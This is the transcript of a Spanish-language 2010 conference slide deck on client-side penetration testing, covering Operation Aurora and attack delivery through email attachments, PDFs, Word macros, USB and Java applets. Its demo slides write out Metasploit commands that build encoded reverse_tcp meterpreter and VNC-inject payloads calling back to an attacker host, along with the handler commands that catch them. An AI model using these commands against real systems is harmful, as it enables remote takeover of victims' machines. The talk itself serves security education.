what works on client side pentesting
TRANSCRIPT
What Work’s OnClient Side Pentesting
CAMPUS PARTY COLOMBIA 2010
I’m a UserI’m a Pentester
iLifekungfoosion.com
@kfs
www.linkedin.com/in/lpigner
Agenda
• ¿ Por Qué Client Side ?
• La Operación Aurora
• Distribución y Ataques
• Conclusión
¿ Por Qué Client Side ?
DIFERENTES TIPOS DE PENETRATION TESTING
Phone Attacker
Wardialinges lo mejor!
Network Attacker
No! Yo tengo un 0-day para
IIS 6.0!
Social Engineer
Jodanse!Yo entro
caminando
DMZ
LAN
DOMINIO
SMTP WWW
Firewall
ATACANTE
INTERNET
BASE DEDATOS
DMZ
LAN
DOMINIO
SMTP WWW
Firewall
INTERNET
BASE DEDATOS
IPSReverse Proxy
IDS
Web App FW
ATACANTE
DMZ
LAN
Firewall
ATACANTE
INTERNET
Agenda
• ¿ Por Qué Client Side ?
• La Operación Aurora
• Distribución y Ataques
• Conclusión
La Operación Aurora
12 de Enerode 2010
[2] Google Blog: A new approach to China
“ataques altamente sofisticados y dirigidos ... originados desde China”
+ 30[1] Wikipedia: Operation Aurora
“Operación Aurora”
Google se va de China (?)
Google.cn
Google.com.ar
“illegal flower
tribute”
[4] Wikipedia: Illegal flower tribute
Texas
Taiwan
PDF, DOC, XLS, CAD, E-mail
CAB, RAR
[3] Mandiant M-Trends “the advanced persistent threat”
y el resto...
0-day para IE 6-7-8
[6] Wepawet exploit[7] German government warns against using MS Explorer
- 12 de Enero: Anuncio de Google
- 14 de Enero: Exploit en Wepawet
- 14 de Enero: Advisory de Microsoft
- 15 de Enero: PoC de MetaSploit
- 21 de Enero: Microsoft update (fuera de ciclo)
DEMO #1 “Aurora”
www
Mas información en:
KUNGFOOSION: Estalló la CyberGuerra!
OSVDB 61697This module exploits a memory corruption flaw in Internet Explorer. This flaw was found in the wild and was a key component of the "Operation Aurora" attacks that lead to the compromise of a number of high profile companies. The exploit code is a direct port of the public sample published to the Wepawet malware analysis site. The technique used by this module is currently identical to the public sample, as such, only Internet Explorer 6 can be reliably exploited.
Afecta a:- Internet Explorer 6- Internet Explorer 7- Internet Explorer 8
Agenda
• ¿ Por Qué Client Side ?
• La Operación Aurora
• Distribución y Ataques
• Conclusión
Distribución y Ataques
payload+
encoding
DEMO #2 “Payload + Encoding”
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.162.138 LPORT=443 X > payload_1.exe
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.162.138 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 10 -t raw | msfencode -e x86/alpha_upper -c 3 -t raw | msfencode -e x86/countdown -c 3 -t raw | msfencode -e x86/call4_dword_xor -c 3 -t exe -o payload_2.exe
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.162.138 LPORT=443 E
Tienes un E-Mail
CASO de ESTUDIO (?)
25000 mails
1883 interesados
Browsers
SistemaOperativo
Soporte de Java
Versionesde Flash
Tienes un E-Mail
Abre miadjunto!
Archivos Mas Utilizados
38%
7%4%
47%
3%
DOC XLS PPTPDF otros
[8] PDF Based Target Attacks are Increasing
2008
1968
2009
2195
2010
895
DEMO #3 “PDF Exploit”Mas información en:
KUNGFOOSION: Explotando el 0-day de Adobe Reader
OSVDB 61697This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional < 8.1.3. By creating a specially crafted pdf that a contains malformed util.printf() entry, an attacker may be able to execute arbitrary code.
Afecta a:- Adobe Reader 8.1.2
DEMO #4 “PDF + EXE”
+EXE
Mas información en:
KUNGFOOSION: Embebiendo un Ejecutable dentro de un PDF con MetaSploit
+ EXE
[8] PDF Based Target Attacks are Increasing
2008
1968
2009
2195
2010
895
DEMO #5 “Word”
./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.162.138 LPORT=443 V > macro_word.bas
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.162.138 LPORT=443 E
DEMO #5 “Word”
La Recepcionista
DEMO #6 “USB U3”Mas información en:
KUNGFOOSION: Ataque USB U3 con MetaSploit
SETsocial engineering toolkit
“The Java Applet Attack”Mas información en:
KUNGFOOSION: Ingeniería Social con Applets firmados de Java en MetaSploit
Gracias!kungfoosion.com
@kfs
www.linkedin.com/in/lpigner